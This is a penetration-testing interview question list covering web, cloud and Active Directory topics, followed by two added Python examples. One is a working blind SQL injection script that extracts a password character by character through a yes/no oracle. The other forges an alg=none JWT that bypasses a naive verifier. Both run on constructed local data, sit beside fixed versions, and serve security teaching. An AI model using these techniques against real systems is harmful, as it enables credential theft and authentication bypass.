VAPT Interview Questions-1

Uploaded by amarjeetandkumar

Interview Questions

Different types of encryption
Difference between encoding and encryption
Explain SSL and TLS
Difference between HTTP and HTTPS
Different HTTP methods and their use cases
Name common HTTP headers and their use cases
How are the HTTP body and headers separated in a request?
What is a cookie and what are its uses?
What is the use of a CSRF token?
Tools you have used
Questions on Burp Suite
OWASP Top 10 (Web)
Questions on projects and difficulties faced during the development phase
Difference between CSRF and SSRF
Can a CSRF attack be performed against a JSON request?
What is a DNS zone transfer?
Name the attacks against the OAuth mechanism
Can XXE be performed via an Excel file upload?
What is cross-site WebSocket hijacking?
Can CSP protect against LFI?
Can injection attacks be performed against JWT?
Is JWT stateful or stateless?
What is your methodology to identify SSTI?
What is an SSTI polyglot?
What is CRLF injection and how can it be used to get an open URL redirect?
Common sources and sinks for DOM-based XSS
What is a CORS policy and what prerequisites are needed to exploit CORS misconfigurations?
What kinds of attacks can be performed against JWT?
What is blind SQL injection and how can we exploit it?
Explain a race condition with a valid example.
Explain mass assignment with a valid example.
The cloud config reviews you performed are based on which benchmarks?
Prowler or ScoutSuite: which tool do you prefer and why?
Questions on vulnerabilities:
SSRF
IDOR
XXE
XSS
Prototype pollution
Working of SSH
Network pentesting and Active Directory questions if you mention you know about them during the interview
Tools used in network PT
Nmap and its uses
Have you used Nessus?
Authentication in AD
Golden Ticket attack
What is a forest in AD?
Remaining technical questions depend on your CV
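The blind SQL injection question above is usually answered best by showing the mechanics. The following is an added example written for this page, not part of the original question list: a constructed in-memory SQLite table with a "does this user exist" endpoint that concatenates input into the query and only ever returns yes/no. The attacker turns that yes/no into an oracle and recovers the admin password column by binary-searching the length and then each character's code point (SQLite's unicode() and substr()), which costs about seven requests per character. The table contents, the secret value and the function names are all assumptions for the example; a parameterised version of the same lookup is shown alongside as the fix.

```python
import sqlite3

# Constructed sample data (not from the original page): the attacker's goal is to
# read the admin password column without ever seeing query results directly.
SECRET = "s3cr3t-t0ken"


def build_db():
    """Create an in-memory SQLite database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))
    conn.execute("INSERT INTO users VALUES ('guest', 'guest')")
    conn.commit()
    return conn


def user_exists_vulnerable(conn, username):
    """Vulnerable: user input is concatenated into the query. The caller only
    learns True/False ('username taken' vs 'available'), which is the blind
    oracle the attacker abuses."""
    query = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchone() is not None


def user_exists_fixed(conn, username):
    """Fixed: a bound parameter keeps the input as data, never as SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


class BlindOracle:
    """Wraps the vulnerable endpoint as a yes/no oracle and counts requests."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def ask(self, condition):
        # Payload closes the string, ANDs our condition onto admin's row and
        # comments out the trailing quote:  ... username = 'admin' AND (cond) -- '
        self.requests += 1
        payload = "admin' AND (" + condition + ") -- "
        return user_exists_vulnerable(self.conn, payload)

    def extract_int(self, expr, lo, hi):
        """Binary-search the integer value of SQL expression `expr` in [lo, hi]
        using only '> mid' comparisons (about log2(hi - lo) requests)."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self.ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract_secret(self):
        """Recover admin's password column one character at a time."""
        length = self.extract_int("length(password)", 0, 64)
        chars = []
        for i in range(1, length + 1):
            # unicode() gives the code point of the first character of its argument;
            # substr() is 1-indexed in SQLite.
            code = self.extract_int(f"unicode(substr(password, {i}, 1))", 0, 127)
            chars.append(chr(code))
        return "".join(chars)


if __name__ == "__main__":
    oracle = BlindOracle(build_db())
    print(oracle.extract_secret(), "recovered in", oracle.requests, "requests")
```

Against a real target the oracle is an HTTP response difference (status code, page length, error string) or, for fully blind cases, a timing difference using a sleep function; the search logic stays the same.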
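Two of the questions above ask what attacks can be performed against JWT and whether injection is possible against it. The example below is added for this page and is not from the original list; it implements HS256 signing with only the standard library (no PyJWT) and contrasts a verifier that trusts the client-supplied "alg" header with one that pins the algorithm and compares the MAC in constant time. The key value, claim names and helper names are assumptions made for the example. The forged token carries alg=none and an empty signature, which the naive verifier accepts and the hardened one rejects.

```python
import base64
import hashlib
import hmac
import json

# Constructed server-side HMAC key (an assumption for this example, not a real secret).
KEY = b"constructed-example-key-do-not-reuse"


def b64url_encode(data: bytes) -> str:
    """JWT uses unpadded URL-safe base64."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _encode_json(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a token: base64url(header).base64url(payload).base64url(HMAC-SHA256)."""
    signing_input = _encode_json({"alg": "HS256", "typ": "JWT"}) + "." + _encode_json(claims)
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_naive(token: str, key: bytes):
    """Vulnerable: honours whatever 'alg' the client put in the header, so a
    token with alg=none is accepted with no signature at all."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_hardened(token: str, key: bytes, expected_alg: str = "HS256"):
    """Fixed: the server pins the algorithm it issues with, rejects anything
    else (including 'none'), and compares the MAC in constant time."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(b64url_decode(h))
    except ValueError:  # covers bad base64 and bad JSON
        return None
    if header.get("alg") != expected_alg:
        return None
    expected = hmac.new(key, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


def forge_alg_none(token: str, new_claims: dict) -> str:
    """Attacker side: keep the claims, overwrite some, switch alg to none and
    drop the signature. Needs no key at all."""
    _, p, _ = token.split(".")
    claims = json.loads(b64url_decode(p))
    claims.update(new_claims)
    return _encode_json({"alg": "none", "typ": "JWT"}) + "." + _encode_json(claims) + "."


if __name__ == "__main__":
    issued = sign_hs256({"sub": "alice", "role": "user"}, KEY)
    forged = forge_alg_none(issued, {"role": "admin"})
    print("naive verifier   :", verify_naive(forged, KEY))
    print("hardened verifier:", verify_hardened(forged, KEY))
```

The same pinning rule is what stops RS256-to-HS256 confusion (the public key being used as an HMAC secret): the verifier decides the algorithm, never the token.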
Basic MR and HR questions:
Who is the CEO of the company?
Why do you want to work at the company?
How and where did you learn about cyber security?
What is your biggest achievement in your current company?
Tell me about a critical-severity vulnerability you discovered during your time at your current company.
Will you be able to relocate?
